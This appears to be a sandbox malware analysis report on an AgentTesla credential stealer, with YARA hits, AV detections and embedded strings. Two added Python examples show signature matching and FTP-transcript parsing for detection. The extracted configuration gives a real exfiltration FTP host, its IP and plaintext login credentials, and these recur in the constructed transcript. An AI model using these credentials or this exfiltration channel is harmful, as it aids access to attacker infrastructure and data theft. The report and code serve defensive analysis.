
Windows Analysis Report
QNx8Bu7CNn.exe

Overview

General Information

Sample Name: QNx8Bu7CNn.exe
Analysis ID: 715065
MD5: 9a9cb1f7f37aa3955cfb4d8991583e31
SHA1: 8d63b02db5ce9bb9bb1691ab4a5282d18078191a
SHA256: 943089ba13faf44a75c9624e2b68af1f561d5567bb4ba7cf4a2596b129da6a2b
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • QNx8Bu7CNn.exe (PID: 5292, cmdline: C:\Users\user\Desktop\QNx8Bu7CNn.exe, MD5: 9A9CB1F7F37AA3955CFB4D8991583E31)
    • QNx8Bu7CNn.exe (PID: 5840, cmdline: C:\Users\user\Desktop\QNx8Bu7CNn.exe, MD5: 9A9CB1F7F37AA3955CFB4D8991583E31)
  • cleanup
Malware Configuration

{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.valvulasthermovalve.cl/", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
Yara Overview

Memory dumps

Source | Rule | Description | Author | Strings
00000001.00000000.262156014.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000000.262156014.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000001.00000000.262156014.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  • 0x30080:$a13: get_DnsResolver
  • 0x2e88e:$a20: get_LastAccessed
  • 0x309fe:$a27: set_InternalServerPort
  • 0x30d1a:$a30: set_GuidMasterKey
  • 0x2e995:$a33: get_Clipboard
  • 0x2e9a3:$a34: get_Keyboard
  • 0x2fcb3:$a35: get_ShiftKeyDown
  • 0x2fcc4:$a36: get_AltKeyDown
  • 0x2e9b0:$a37: get_Password
  • 0x2f463:$a38: get_PasswordHash
  • 0x30480:$a39: get_DefaultCredentials
00000000.00000002.278449042.000000000477F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.278449042.000000000477F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(table truncated: 10 entries in the full report)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x32b4d:$s10: logins
  • 0x66f6d:$s10: logins
  • 0x325b4:$s11: credential
  • 0x669d4:$s11: credential
  • 0x2eb95:$g1: get_Clipboard
  • 0x62fb5:$g1: get_Clipboard
  • 0x2eba3:$g2: get_Keyboard
  • 0x62fc3:$g2: get_Keyboard
  • 0x2ebb0:$g3: get_Password
  • 0x62fd0:$g3: get_Password
  • 0x2fea3:$g4: get_CtrlKeyDown
  • 0x642c3:$g4: get_CtrlKeyDown
  • 0x2feb3:$g5: get_ShiftKeyDown
  • 0x642d3:$g5: get_ShiftKeyDown
  • 0x2fec4:$g6: get_AltKeyDown
  • 0x642e4:$g6: get_AltKeyDown
0.2.QNx8Bu7CNn.exe.47e9d28.8.raw.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  • 0x30280:$a13: get_DnsResolver
  • 0x646a0:$a13: get_DnsResolver
  • 0x2ea8e:$a20: get_LastAccessed
  • 0x62eae:$a20: get_LastAccessed
  • 0x30bfe:$a27: set_InternalServerPort
  • 0x6501e:$a27: set_InternalServerPort
  • 0x30f1a:$a30: set_GuidMasterKey
  • 0x6533a:$a30: set_GuidMasterKey
  • 0x2eb95:$a33: get_Clipboard
  • 0x62fb5:$a33: get_Clipboard
  • 0x2eba3:$a34: get_Keyboard
  • 0x62fc3:$a34: get_Keyboard
  • 0x2feb3:$a35: get_ShiftKeyDown
  • 0x642d3:$a35: get_ShiftKeyDown
  • 0x2fec4:$a36: get_AltKeyDown
  • 0x642e4:$a36: get_AltKeyDown
  • 0x2ebb0:$a37: get_Password
  • 0x62fd0:$a37: get_Password
  • 0x2f663:$a38: get_PasswordHash
  • 0x63a83:$a38: get_PasswordHash
  • 0x30680:$a39: get_DefaultCredentials
0.2.QNx8Bu7CNn.exe.47e9d28.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(table truncated: 19 entries in the full report)
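The string hits in the tables above (offset, identifier, matched text) are what YARA reports for the string section of each rule; in the unpacked dump every Windows_Trojan_AgentTesla_d3ac2b2f string appears at two offsets because that region carries two copies of the payload. As an added example, not code from the report or from the rules' authors, the Python below reimplements that string-set matching for the Windows_Trojan_AgentTesla_d3ac2b2f identifiers listed above, in both ASCII and UTF-16LE (wide) form, and renders hits in the report's 0x<offset>:$id: <string> layout. The buffer it scans is constructed (a fake .NET #Strings heap embedded twice plus one wide string), and the "8 of them" condition is an assumption for the example; the real rule's condition is not shown on this page.

```python
"""Added example: the string-set part of a YARA rule, in plain Python.

Identifiers and strings come from the Windows_Trojan_AgentTesla_d3ac2b2f
hits in the report. The '8 of them' condition is an assumption for this
example (the real rule's condition is not on this page), and the buffer
scanned below is constructed, not a dump from the sample.
"""
from typing import Dict, List, Tuple

STRINGS: Dict[str, bytes] = {
    "$a13": b"get_DnsResolver",
    "$a20": b"get_LastAccessed",
    "$a27": b"set_InternalServerPort",
    "$a30": b"set_GuidMasterKey",
    "$a33": b"get_Clipboard",
    "$a34": b"get_Keyboard",
    "$a35": b"get_ShiftKeyDown",
    "$a36": b"get_AltKeyDown",
    "$a37": b"get_Password",
    "$a38": b"get_PasswordHash",
    "$a39": b"get_DefaultCredentials",
}

Hit = Tuple[int, str, str]   # (offset, identifier, matched text)


def _find_all(buf: bytes, needle: bytes) -> List[int]:
    """All offsets of needle in buf, overlapping occurrences included."""
    offsets, start = [], 0
    while (off := buf.find(needle, start)) >= 0:
        offsets.append(off)
        start = off + 1
    return offsets


def find_strings(buf: bytes, strings: Dict[str, bytes] = STRINGS) -> List[Hit]:
    """Every hit for every identifier, as YARA's 'ascii wide' modifiers
    would produce it: the ASCII form and the UTF-16LE form both count.
    Like YARA, a shorter string also hits inside a longer one
    (get_Password inside get_PasswordHash)."""
    hits: List[Hit] = []
    for ident, needle in strings.items():
        text = needle.decode("ascii")
        for enc in (needle, text.encode("utf-16-le")):
            hits.extend((off, ident, text) for off in _find_all(buf, enc))
    return sorted(hits)


def rule_matches(buf: bytes, min_distinct: int = 8) -> bool:
    """Assumed condition: at least min_distinct different identifiers hit."""
    return len({ident for _, ident, _ in find_strings(buf)}) >= min_distinct


def format_like_report(hits: List[Hit]) -> List[str]:
    """Render hits the way the sandbox lists them: 0x30080:$a13: get_DnsResolver."""
    return [f"0x{off:x}:{ident}: {text}" for off, ident, text in hits]


def build_sample() -> bytes:
    """Constructed input: .NET metadata keeps method names NUL-terminated in
    the #Strings heap, so embed such a heap after a fake 32-byte header,
    repeat the block once (the unpacked dump in the report carries two
    copies), and append one name in UTF-16LE to exercise the wide form."""
    names = [b"get_Clipboard", b"get_Keyboard", b"get_Password",
             b"get_ShiftKeyDown", b"get_AltKeyDown", b"get_PasswordHash",
             b"get_DnsResolver", b"set_GuidMasterKey", b"Foo"]
    heap = b"\x00".join(names) + b"\x00"
    block = b"MZ" + b"\x90" * 30 + heap
    return block + b"\x00" * 16 + block + "get_DefaultCredentials".encode("utf-16-le")


if __name__ == "__main__":
    sample = build_sample()
    for line in format_like_report(find_strings(sample)):
        print(line)
    print("rule matches:", rule_matches(sample))
```

The strings are plain .NET property accessor names, which is why such rules fire on a memory dump or an unpacked PE rather than on the packed file on disk: the loader stage (process 0) only exposes them once the payload is decrypted in memory, which matches the report's hits landing in sdmp regions and .unpack objects.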
                No Sigma rule has matched
                No Snort rule has matched

                AV Detection

Source: QNx8Bu7CNn.exe | ReversingLabs: Detection: 26%
Source: QNx8Bu7CNn.exe | Virustotal: Detection: 32%
Source: ftp://ftp.valvulasthermovalve.cl/cva19491 | URL Reputation: Label: phishing
Source: http://ftp.valvulasthermovalve.cl | Avira URL Cloud: Label: phishing
Source: ftp.valvulasthermovalve.cl | Virustotal: Detection: 17%
Source: QNx8Bu7CNn.exe | Joe Sandbox ML: detected
Source: 1.0.QNx8Bu7CNn.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.QNx8Bu7CNn.exe.47e9d28.8.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.valvulasthermovalve.cl/", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
Source: QNx8Bu7CNn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: QNx8Bu7CNn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Joe Sandbox View | IP Address: 190.107.177.239
Source: unknown | FTP traffic detected: 190.107.177.239:21 -> 192.168.2.7:49703
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 10 of 100 allowed.
  220-Local time is now 09:49. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.valvulasthermovalve.cl/cva19491
Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: QNx8Bu7CNn.exe, 00000001.00000002.510640859.0000000002C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.valvulasthermovalve.cl
Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pzxuZU.com
Source: QNx8Bu7CNn.exe, 00000001.00000002.510594948.0000000002C69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp, QNx8Bu7CNn.exe, 00000001.00000002.510594948.0000000002C69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://uZTc8nGgAr9KT9EFaKnD.net
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: QNx8Bu7CNn.exe, 00000000.00000002.280625866.00000000073A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: QNx8Bu7CNn.exe, 00000001.00000002.507516330.0000000002921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: ftp.valvulasthermovalve.cl

Note on the string hits: the sandbox lists every URL-shaped string it finds. The font vendor and licence URLs from the 0x73A2000 region of process 0 (fontbureau.com, fonts.com, founder.com.cn, galapagosdesign.com, goodfont.co.kr, jiyu-kobo.co.jp, sajatypeworks.com, sakkal.com, sandoll.co.kr, tiro.com, typography.net, urwpp.de, zhongyicts.com.cn, carterandcone.com, fontfabrik.com and the Apache licence link) are copyright strings carried by font files embedded in the loader's resources (the "DPlease" fragments are the start of the fonts' "Please refer to the copyright" notices), not network indicators. The indicators worth acting on are ftp.valvulasthermovalve.cl, 190.107.177.239 and the FTP credentials in the extracted configuration; the DynDNS, Psi and Tor strings are AgentTesla's own feature strings and are present regardless of which exfiltration mode the build uses.
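The FTP banner captured above is a multi-line 220 reply: under RFC 959 section 4.2 a hyphen after the reply code opens a multi-line reply and a space after the code on a later line closes it. The Python below is an added example, not part of the report, that parses a control-channel transcript of such a session and extracts what an analyst wants from it: the greeting, whether credentials went over in cleartext (no accepted AUTH TLS before PASS), whether the login succeeded, and which uploads completed. The six 220 lines are the ones the sandbox captured from 190.107.177.239:21 and the USER/PASS values are the ones from the extracted configuration; every client command, all other server replies and the uploaded file name are constructed for the example, and nothing touches the network.

```python
"""Added example: parse an FTP control-channel transcript and pull out
session indicators.

The 220 banner lines are the ones the sandbox captured and the
credentials are the ones from the extracted configuration; the rest of
the transcript (client commands, other replies, file name) is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

REPLY = re.compile(r"^(\d{3})([ -])(.*)$")   # code, separator, text


@dataclass
class FtpSession:
    banner: List[str] = field(default_factory=list)
    user: Optional[str] = None
    password: Optional[str] = None
    tls: bool = False            # True only after the server answers AUTH with 234
    login_ok: bool = False
    uploads: List[Dict[str, object]] = field(default_factory=list)


def _reply_complete(s: FtpSession, code: str, pending: Optional[str]) -> None:
    """Correlate a finished server reply with the client command it answers."""
    if code == "230" and pending == "PASS":
        s.login_ok = True
    elif code == "234" and pending == "AUTH":
        s.tls = True
    elif code == "226" and pending in ("STOR", "APPE") and s.uploads:
        s.uploads[-1]["confirmed"] = True


def parse_transcript(lines: List[Tuple[str, str]]) -> FtpSession:
    """lines: ('C', text) for client commands, ('S', text) for server replies.

    Multi-line replies follow RFC 959 section 4.2: '220-...' opens the reply,
    any lines may follow, and '220 ...' (space after the code) closes it."""
    s = FtpSession()
    pending: Optional[str] = None      # last client verb awaiting a reply
    open_code: Optional[str] = None    # code of a multi-line reply in progress
    for side, text in lines:
        if side == "C":
            verb, _, arg = text.partition(" ")
            pending = verb.upper()
            if pending == "USER":
                s.user = arg
            elif pending == "PASS":
                s.password = arg
            elif pending in ("STOR", "APPE"):
                s.uploads.append({"name": arg, "confirmed": False})
            continue
        m = REPLY.match(text)
        if open_code is not None:
            same_code = m is not None and m.group(1) == open_code
            body = m.group(3) if same_code else text
            if open_code == "220":
                s.banner.append(body)
            if same_code and m.group(2) == " ":
                _reply_complete(s, open_code, pending)
                open_code = None
            continue
        if m is None:
            continue
        code, sep, body = m.groups()
        if code == "220":
            s.banner.append(body)
        if sep == "-":
            open_code = code
        else:
            _reply_complete(s, code, pending)
    return s


def indicators(s: FtpSession) -> List[str]:
    """What a detection engineer would want raised from the session."""
    out: List[str] = []
    if s.password is not None and not s.tls:
        out.append("credentials sent in cleartext")
    if s.login_ok:
        out.append(f"login as {s.user}")
    out.extend(f"upload {u['name']}" for u in s.uploads if u["confirmed"])
    return out


# Constructed transcript: 220 lines from the report, credentials from the
# extracted config, everything else made up for the example.
TRANSCRIPT: List[Tuple[str, str]] = [
    ("S", "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------"),
    ("S", "220-You are user number 10 of 100 allowed."),
    ("S", "220-Local time is now 09:49. Server port: 21."),
    ("S", "220-This is a private system - No anonymous login"),
    ("S", "220-IPv6 connections are also welcome on this server."),
    ("S", "220 You will be disconnected after 15 minutes of inactivity."),
    ("C", "USER cva19491@valvulasthermovalve.cl"),
    ("S", "331 User cva19491@valvulasthermovalve.cl OK. Password required"),
    ("C", "PASS LILKOOLL14!!"),
    ("S", "230 OK. Current restricted directory is /"),
    ("C", "TYPE I"),
    ("S", "200 TYPE is now 8-bit binary"),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (190,107,177,239,195,10)"),
    ("C", "STOR PW_user-PC_2022_10_10_09_49_00.html"),
    ("S", "150 Accepted data connection"),
    ("S", "226-File successfully transferred"),
    ("S", "226 0.012 seconds (measured here), 4.21 Kbytes per second"),
    ("C", "QUIT"),
    ("S", "221-Goodbye. You uploaded 5 and downloaded 0 kbytes."),
    ("S", "221 Logout."),
]

if __name__ == "__main__":
    session = parse_transcript(TRANSCRIPT)
    print("\n".join(session.banner))
    print(indicators(session))
```

The server advertises [TLS] in its banner, but the sample never sends AUTH TLS, so the stolen data and the FTP credentials both cross the wire in the clear; that is why the USER and PASS values were recoverable from the capture as well as from the configuration extractor, and why an outbound port 21 session from a workstation to a server the host has never contacted before deserves an alert on its own.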